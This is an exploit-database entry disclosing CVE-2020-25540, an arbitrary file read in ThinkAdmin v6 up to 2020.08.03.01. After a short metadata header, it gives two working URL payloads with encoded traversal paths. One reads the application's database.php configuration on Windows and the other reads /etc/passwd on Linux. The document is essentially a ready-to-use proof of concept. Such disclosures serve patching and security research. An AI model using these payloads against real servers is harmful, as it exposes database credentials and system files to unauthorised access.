# Exploit Title: ThinkAdmin 6 - Arbitrarily File Read # Google Dork: N/A # Date: 2020-09-14 # Exploit Author: Hzllaga # Vendor Homepage: https://github.com/zoujingli/ThinkAdmin/ # Software Link: Before https://github.com/zoujingli/ThinkAdmin/commit/ff2ab47cfabd4784effbf72a2a386c5d25c43a9a # Version: v6 <= 2020.08.03.01 # Tested on: PHP7.4.7,Apache # CVE : CVE-2020-25540 PoC: On Windows read database.php payload: /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34 On Linux read /etc/passwd payload: /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s